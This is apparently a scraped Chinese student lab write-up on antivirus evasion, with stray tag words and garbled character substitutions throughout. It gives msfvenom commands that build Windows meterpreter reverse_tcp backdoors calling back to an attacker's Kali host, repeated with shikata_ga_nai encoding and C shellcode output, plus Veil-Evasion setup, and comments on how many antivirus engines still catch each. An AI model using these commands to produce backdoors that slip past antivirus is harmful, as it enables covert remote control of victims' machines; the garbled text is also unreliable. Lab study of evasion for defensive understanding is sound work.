基于行为的恶意软件检测python
免杀即“反-反病毒”/“反杀毒技术”,在这个实验中可让安插的后门不被AV软件发现。shell
经过virscan平台的几回实验,对各种杀毒软件的靠谱性有了大体的了解(虽然可能一些杀软由于运气很差被我冤枉了),总的来说,好像外国的杀软更好用一点啊?咱们平日里解除的某卫士、某星、某毒霸令我失望。windows
IP地址会有更新。数组
msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的ip PORT=任意 -f exe > met.exe
生成meterpreter可执行文件毕竟是简单恶意软件,能够看出来,仍是不少杀软发现有病毒的。安全
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=kali的ip LPORT=任意 -f exe > met1.exe
生成编码一次的可执行文件好像能查杀出来的AV稍微少了点哦,不过进步不明显,仍是要努力啊。tcp
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=kali的ip LPORT=任意 -f exe > met2.exe
算了,你们知道就好,咱们的恶意软件依然没有多大进步,看来AV对这种软件的抵抗度很高,毕竟西方哪个国家我没有去过~编码
veil-evasion
进入ve界面,输入use python/meterpreter/rev_tcp
set LHOST
和set LPORT
命令,都设为kali的,成功界面以下:/var/lib/veil-evasion/output/compiled/
,你们进去本身找一下已经有很大的进步啦,这种方式效果不错加密
msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的IP LPORT=任意 -f c
生成一个C语言数组很厉害啊,只有几个杀软能杀出来了3d